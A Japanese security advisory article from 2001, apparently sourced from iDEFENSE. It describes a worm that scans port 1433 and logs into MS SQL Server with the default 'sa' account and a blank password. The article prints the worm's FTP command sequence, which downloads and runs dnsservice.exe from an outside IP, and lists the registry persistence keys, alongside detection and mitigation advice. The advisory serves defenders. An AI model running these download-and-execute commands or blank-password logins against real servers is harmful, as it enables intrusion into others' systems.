マイクロソフトSQLサーバーを狙ったワームが蔓延中 | ScanNetSecurity
2025.02.28(金)
コンテンツ
注目検索ワード
ホーム 国際 海外情報 記事

マイクロソフトSQLサーバーを狙ったワームが蔓延中

概要:
 TCPポート1433を走査しているワームが蔓延中との報告がある。1433ポートはマイクロソフト社のSQL サーバーのポートとして使用される事が多い。1433ポートが開いている事をワームが確認すると、ワームはホストへの侵入をユーザー名sa、 パスワードはブランク(無

国際
21 views
概要:
 TCPポート1433を走査しているワームが蔓延中との報告がある。1433ポートはマイクロソフト社のSQL サーバーのポートとして使用される事が多い。1433ポートが開いている事をワームが確認すると、ワームはホストへの侵入をユーザー名sa、 パスワードはブランク(無し)で試みる。アプリケーションの多くがSQLサポートを使用している為、システム管理者が使用するIDとしてデフォルトが"sa"になっておりパスワードは設定されていない。

 ログオンに成功すると、ポート6669にあるbots.kujikiri.netのIRCサーバーに接続する。ワームがホストに到達すると、IRCチャンネルに"ホストが感染した"というメッセージを残す。次にIPアドレス207.29.192.160(フィラデルフィア美術館に関係したアドレス)にFTP接続し以下のコマンドを実行する。

ftp
foo.com
bin
cd pub
cd tmp
get dnsservice.exe
start dnsservice.exe
close
quit

 上記の"ftp"はFTPアクセスに使用されたユーザ−名で" foo.com "は パスワードとして使用されている。感染したホストにdnsservice.exeをダウンロードし実行する仕掛けになっている。現段階ではこの実行ファイルによる影響は分っていない。

 更にコンピュータが起動する度にプログラムが走るようにレジストリに以下の3つのキーが書き加えられる。

SOFTWAREMicrosoftWindowsCurrentVersionRunTaskReg
SOFTWAREMicrosoftMSSQLServerClientSuperSocketNetLibProtocolOrder
SOFTWAREMicrosoftMSSQLServerClientConnectToDSQUERY


情報ソース:
Neohapis Archives (MS SQL HACKING, ), Nov. 13, 2000
http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0094.html
incidents@securityfocus.com (Douglas P. Brown (dugbrown@email.unc.edu)), Nov. 20, 2001
BugTraq (Patrick Andry, pandry@wolverinefreight.ca), Nov. 20, 2001
BugTraq (Arthur Donkers, arthur@reseau.nl), Nov. 20, 2001
Incidents.org Oct. 04, 2001
http://www.incidents.org/diary/october01/100401.php#043
iDEFENSE Intelligence Operations, Nov. 20, 2001
iDEFENSE Labs, Nov. 20, 2001


分析:
 目的は不明だが、ワームは開いている1433TCPポートを走査している。このポートは通常、SQLサーバーを使用するProject 2000, Viso2000, Access 2000 及び Visual Studio 6.0が使用されている時に稼動する。

 SANS研究所によれば、最近、ポート1433の走査が盛んに行われたのは今年の10月上旬頃からとの報告がある。多くのスキャンは韓国発である事も確認されている。

 現時点ではアドレス207.29.192.160のFTPサーバー及び関連している実行ファイルの情報は入手出来ていないが、ワームの当バージョンは繁殖していない可能性もある。但し、将来、Ramenワームの様に新に感染したホストに自らのコピーをアップロード出来る亜種が発生する可能性もある。この様な亜種が発生すれば繁殖を抑える事は難しくなる。


検知方法:
 上記のレジストリがあれば感染している可能性がある。さらに Windows NT.4.0/2000では、システム管理者がMSSQLサーバーサービスが稼動していればコントロールパネルのサービスで確認する事ができる。IDS(侵入検知)で上記のテキスト文をftpセッション若しくはIRCとFTPに出て行くコネクションをモニターする事でワームを検知する事ができる。


暫定処置:
 コマンドプロンプトでnetstat -aのコマンドをかけて現在のポートの使用状況が確認できる。もし、TCP 1433ポートがあればSQLの機能と関連しているデフォルトのユーザ名、パスワードを変更する。また、TCP 1433ポートがインターネット接続に必要なポートでなければ、ルーター又はファイヤーウォールに当該ポートのingress/egressフィルタリング制限をかけると更に良い。


(詳しくはScan Daily EXpress本誌をご覧下さい)
http://vagabond.co.jp/vv/m-sdex.htm

※この情報はiDEFENSE社( http://www.idefense.co.jp/ )より提供いただいております。情報の内容は以下の時点におけるものです
【23:50 GMT、11、20、2001】

《ScanNetSecurity》
「経理」「営業」「企画」「プログラミング」「デザイン」と並ぶ、事業で成功するためのビジネスセンスが「セキュリティ」
「経理」「営業」「企画」「プログラミング」「デザイン」と並ぶ、事業で成功するためのビジネスセンスが「セキュリティ」

ページ右上「ユーザー登録」から会員登録すれば会員限定記事を閲覧できます。毎週月曜の朝、先週一週間のセキュリティ動向を総括しふりかえるメルマガをお届け。(写真:ScanNetSecurity 永世名誉編集長 りく)
×